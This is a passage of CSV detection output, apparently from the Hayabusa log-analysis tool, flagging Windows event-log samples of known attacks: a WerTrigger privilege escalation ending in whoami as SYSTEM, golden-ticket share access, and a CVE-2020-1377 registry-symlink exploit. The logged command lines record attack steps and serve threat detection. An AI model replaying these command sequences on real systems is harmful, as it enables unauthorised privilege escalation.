LID: 0x3e7 | PID: 6952 | PGUID: 747F3D96-E922-5F33-0000-00107A2B0B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 22:05:38.260 +09:00,MSEDGEWIN10,1,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 22:05:45.570 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\Explorer.EXE | Tgt Process: C:\Program Files (x86)\FileZilla Server\FileZilla Server Interface.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 5144 | Src PGUID: 747F3D96-E914-5F33-0000-001009990500 | Tgt PID: 7480 | Tgt PGUID: 747F3D96-E928-5F33-0000-0010B8330D00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege 
Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 22:06:00.737 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\cmd.exe /c rmdir /s/q C:\ProgramData\Microsoft\Windows\WER\ReportQueue\a_b_c_d_e > nul 2>&1 | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: WerTrigger.exe | LID: 0x41c24 | PID: 7836 | PGUID: 747F3D96-E938-5F33-0000-00101CA50E00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 22:06:00.737 +09:00,MSEDGEWIN10,1,high,,Parent in Public Folder Suspicious Process,,rules/sigma/process_creation/proc_creation_win_public_folder_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 22:06:00.737 +09:00,MSEDGEWIN10,1,low,Evas,Windows Cmd Delete File,,rules/sigma/process_creation/proc_creation_win_cmd_delete.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 22:06:00.737 +09:00,MSEDGEWIN10,1,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 22:06:01.637 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\system32\cmd.exe /c mkdir,C:\ProgramData\Microsoft\Windows\WER\ReportQueue\a_b_c_d_e | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: WerTrigger.exe | LID: 0x41c24 | PID: 7852 | PGUID: 747F3D96-E939-5F33-0000-0010ACAB0E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 22:06:01.637 +09:00,MSEDGEWIN10,1,high,,Parent in Public Folder Suspicious 
Process,,rules/sigma/process_creation/proc_creation_win_public_folder_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 22:06:02.552 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\cmd.exe /c copy Report.wer C:\ProgramData\Microsoft\Windows\WER\ReportQueue\a_b_c_d_e > nul 2>&1 | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: WerTrigger.exe | LID: 0x41c24 | PID: 7868 | PGUID: 747F3D96-E93A-5F33-0000-001014B30E00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 22:06:02.552 +09:00,MSEDGEWIN10,1,high,,Parent in Public Folder Suspicious Process,,rules/sigma/process_creation/proc_creation_win_public_folder_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 22:06:02.552 +09:00,MSEDGEWIN10,1,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 22:06:03.487 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\system32\cmd.exe /c schtasks /run /TN ""Microsoft\Windows\Windows Error Reporting\QueueReporting"" > nul 2>&1 | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: WerTrigger.exe | LID: 0x41c24 | PID: 7888 | PGUID: 747F3D96-E93B-5F33-0000-0010C1B40E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 22:06:03.487 +09:00,MSEDGEWIN10,1,high,,Parent in Public Folder Suspicious Process,,rules/sigma/process_creation/proc_creation_win_public_folder_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege 
Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 22:06:03.487 +09:00,MSEDGEWIN10,1,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 22:06:04.075 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\wermgr.exe -upload | LID: 0x3e7 | PID: 8032 | PGUID: 747F3D96-E93C-5F33-0000-0010A6F00E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 22:06:08.143 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: whoami | Process: C:\Windows\System32\whoami.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x3e7 | PID: 7460 | PGUID: 747F3D96-E940-5F33-0000-001039310F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 22:06:08.143 +09:00,MSEDGEWIN10,1,low,Disc,Local Accounts Discovery,,rules/sigma/process_creation/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 22:06:08.143 +09:00,MSEDGEWIN10,1,high,PrivEsc | Disc,Run Whoami as SYSTEM,,rules/sigma/process_creation/proc_creation_win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 22:06:08.143 +09:00,MSEDGEWIN10,1,medium,Disc,Whoami Execution,,rules/sigma/process_creation/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx 
+2020-08-21 00:35:28.503 +09:00,rootdc1.offsec.lan,5140,info,Collect,Network Share Access,User: hack-admu-test1 | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.23.9 | LID: 0x2275e86d,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-Failed ADMIN$ share access.evtx +2020-08-21 00:36:32.382 +09:00,rootdc1.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.23.9 | LID: 0x2276a30d,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-Failed ADMIN$ share access.evtx +2020-08-21 00:36:32.391 +09:00,rootdc1.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.23.9 | LID: 0x2276a30d,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-Failed ADMIN$ share access.evtx +2020-08-21 00:37:06.186 +09:00,rootdc1.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.23.9 | LID: 0x2276ac17,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-Failed ADMIN$ share access.evtx +2020-08-21 00:37:14.331 +09:00,rootdc1.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.23.9 | LID: 0x2276ac17,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-Failed ADMIN$ share access.evtx +2020-08-21 00:37:17.039 
+09:00,rootdc1.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.23.9 | LID: 0x2276b0af,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-Failed ADMIN$ share access.evtx +2020-08-21 00:37:35.319 +09:00,rootdc1.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.23.9 | LID: 0x2276b0af,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-Failed ADMIN$ share access.evtx +2020-08-21 00:37:35.773 +09:00,rootdc1.offsec.lan,5140,info,Collect,Network Share Access,User: JUMP01$ | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.23.9 | LID: 0x2276b890,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-Failed ADMIN$ share access.evtx +2020-08-21 00:38:23.185 +09:00,rootdc1.offsec.lan,5140,info,Collect,Network Share Access,User: not_existing_user | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.23.9 | LID: 0x2276d109,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID5140-ADMIN$ share connection with Golden ticket.evtx +2020-08-21 00:39:15.820 +09:00,rootdc1.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.23.9 | LID: 0x2276ac17,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID5140-ADMIN$ share connection with Golden ticket.evtx +2020-08-21 
00:41:58.884 +09:00,fs02.offsec.lan,4624,info,,Logon Type 3 - Network,User: not_existing_user | Computer: - | IP Addr: 10.23.23.9 | LID: 0x119b90e2,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx +2020-08-21 00:42:54.177 +09:00,fs02.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x119b9a72,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx +2020-08-21 00:42:54.177 +09:00,fs02.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x119b9a8f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx +2020-08-21 00:42:54.193 +09:00,fs02.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x119b9aa3,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx +2020-08-21 00:42:54.193 +09:00,fs02.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x119b9ab2,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx +2020-08-21 00:42:55.188 +09:00,fs02.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP 
Addr: 10.23.23.9 | LID: 0x119b9b27,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx +2020-08-21 00:43:04.967 +09:00,fs02.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x119b9e04,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx +2020-08-21 00:43:36.582 +09:00,fs02.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x119ba401,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx +2020-08-21 00:43:36.582 +09:00,fs02.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x119ba414,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx +2020-08-21 00:43:36.582 +09:00,fs02.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x119ba427,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx +2020-08-25 18:58:51.434 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Caches\{17A6A947-B905-4D30-88C9-B63C603DA134}.3.ver0x0000000000000001.db | Process: 
C:\Windows\system32\LogonUI.exe | PID: 8500 | PGUID: 747F3D96-E0DA-5F44-0000-0010B3299600,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx +2020-08-25 19:02:32.697 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\pagefile.sys | Process: C:\Windows\System32\smss.exe | PID: 308 | PGUID: 747F3D96-6039-5F45-0000-00107B2F0000,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx +2020-08-25 19:02:32.701 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\swapfile.sys | Process: C:\Windows\System32\smss.exe | PID: 308 | PGUID: 747F3D96-6039-5F45-0000-00107B2F0000,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx +2020-08-25 19:07:58.690 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\V4Dirs\7C5CC166-44D2-46E6-93CB-3C4165330D89 | Process: C:\Windows\System32\spoolsv.exe | PID: 2576 | PGUID: 747F3D96-E1B3-5F44-0000-001061BC0100,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx +2020-08-25 19:07:58.702 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\V4Dirs\7C5CC166-44D2-46E6-93CB-3C4165330D89\merged.gpd | Process: C:\Windows\System32\spoolsv.exe | PID: 2576 | PGUID: 747F3D96-E1B3-5F44-0000-001061BC0100,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx +2020-08-25 19:07:58.704 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\V4Dirs\7C5CC166-44D2-46E6-93CB-3C4165330D89\pdc.xml | Process: C:\Windows\System32\spoolsv.exe | PID: 2576 | PGUID: 
747F3D96-E1B3-5F44-0000-001061BC0100,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx +2020-08-25 19:07:58.710 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\V4Dirs\7C5CC166-44D2-46E6-93CB-3C4165330D89\device_bidi.gpd | Process: C:\Windows\System32\spoolsv.exe | PID: 2576 | PGUID: 747F3D96-E1B3-5F44-0000-001061BC0100,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx +2020-08-25 19:07:58.719 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\V4Dirs\7C5CC166-44D2-46E6-93CB-3C4165330D89\5b120a24.BUD | Process: C:\Windows\System32\spoolsv.exe | PID: 2576 | PGUID: 747F3D96-E1B3-5F44-0000-001061BC0100,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx +2020-08-25 19:08:05.763 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\user01\Desktop\Debug\ntuser.man | Process: C:\Windows\Explorer.EXE | PID: 4192 | PGUID: 747F3D96-E2A0-5F44-0000-0010B5BA1B00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx +2020-08-25 19:08:05.770 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\user01\Desktop\Debug\ntuser.man.LOG1 | Process: C:\Windows\Explorer.EXE | PID: 4192 | PGUID: 747F3D96-E2A0-5F44-0000-0010B5BA1B00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx +2020-08-25 19:08:05.772 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\user01\Desktop\Debug\ntuser.man.LOG2 | Process: C:\Windows\Explorer.EXE | PID: 4192 | PGUID: 
747F3D96-E2A0-5F44-0000-0010B5BA1B00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx +2020-08-25 19:08:05.776 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\user01\Desktop\Debug\ntuser.man{f9a54a1d-9fa5-11ea-ac3f-00155d0a720b}.TM.blf | Process: C:\Windows\Explorer.EXE | PID: 4192 | PGUID: 747F3D96-E2A0-5F44-0000-0010B5BA1B00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx +2020-08-25 19:08:05.780 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\user01\Desktop\Debug\ntuser.man{f9a54a1d-9fa5-11ea-ac3f-00155d0a720b}.TMContainer00000000000000000001.regtrans-ms | Process: C:\Windows\Explorer.EXE | PID: 4192 | PGUID: 747F3D96-E2A0-5F44-0000-0010B5BA1B00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx +2020-08-25 19:08:05.787 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\user01\Desktop\Debug\ntuser.man{f9a54a1d-9fa5-11ea-ac3f-00155d0a720b}.TMContainer00000000000000000002.regtrans-ms | Process: C:\Windows\Explorer.EXE | PID: 4192 | PGUID: 747F3D96-E2A0-5F44-0000-0010B5BA1B00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx +2020-08-25 19:08:37.398 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\user01\ntuser.man | Process: C:\Users\user01\Desktop\Debug\TransactionLog.exe | PID: 520 | PGUID: 747F3D96-E324-5F44-0000-0010AA0D4100,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx +2020-08-25 19:08:37.401 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\user01\ntuser.man.LOG1 | Process: 
C:\Users\user01\Desktop\Debug\TransactionLog.exe | PID: 520 | PGUID: 747F3D96-E324-5F44-0000-0010AA0D4100,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx +2020-08-25 19:08:37.401 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\user01\ntuser.man.LOG2 | Process: C:\Users\user01\Desktop\Debug\TransactionLog.exe | PID: 520 | PGUID: 747F3D96-E324-5F44-0000-0010AA0D4100,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx +2020-08-25 19:08:37.401 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\user01\ntuser.man{f9a54a1d-9fa5-11ea-ac3f-00155d0a720b}.TM.blf | Process: C:\Users\user01\Desktop\Debug\TransactionLog.exe | PID: 520 | PGUID: 747F3D96-E324-5F44-0000-0010AA0D4100,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx +2020-08-25 19:08:37.401 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\user01\ntuser.man{f9a54a1d-9fa5-11ea-ac3f-00155d0a720b}.TMContainer00000000000000000001.regtrans-ms | Process: C:\Users\user01\Desktop\Debug\TransactionLog.exe | PID: 520 | PGUID: 747F3D96-E324-5F44-0000-0010AA0D4100,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx +2020-08-25 19:08:37.418 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\user01\ntuser.man{f9a54a1d-9fa5-11ea-ac3f-00155d0a720b}.TMContainer00000000000000000002.regtrans-ms | Process: C:\Users\user01\Desktop\Debug\TransactionLog.exe | PID: 520 | PGUID: 747F3D96-E324-5F44-0000-0010AA0D4100,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx +2020-08-25 19:08:37.594 
+09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\user01\ntuser.man{f9a54a1c-9fa5-11ea-ac3f-00155d0a720b}.TxR.blf | Process: C:\Users\user01\Desktop\Debug\TransactionLog.exe | PID: 520 | PGUID: 747F3D96-E324-5F44-0000-0010AA0D4100,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx +2020-08-25 19:08:37.610 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\user01\ntuser.man{f9a54a1c-9fa5-11ea-ac3f-00155d0a720b}.TxR.0.regtrans-ms | Process: C:\Users\user01\Desktop\Debug\TransactionLog.exe | PID: 520 | PGUID: 747F3D96-E324-5F44-0000-0010AA0D4100,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx +2020-08-25 19:08:37.644 +09:00,MSEDGEWIN10,12,medium,,Registry Key Create/Delete_Sysmon Alert,contains | CreateKey: HKLM\SOFTWARE\Microsoft\DRM\DEMO2 | Process: C:\Users\user01\Desktop\Debug\TransactionLog.exe | PID: 520 | PGUID: 747F3D96-E324-5F44-0000-0010AA0D4100,rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx +2020-08-25 19:08:37.644 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,contains | SetValue: HKLM\SOFTWARE\Microsoft\DRM\DEMO2\SymbolicLinkValue: \Registry\Machine\System\CurrentControlSet\Services\ABC | Process: C:\Users\user01\Desktop\Debug\TransactionLog.exe | PID: 520 | PGUID: 747F3D96-E324-5F44-0000-0010AA0D4100,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx +2020-08-25 19:08:37.677 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\user01\ntuser.man | Process: C:\Users\user01\Desktop\Debug\TransactionLog.exe | PID: 520 | PGUID: 
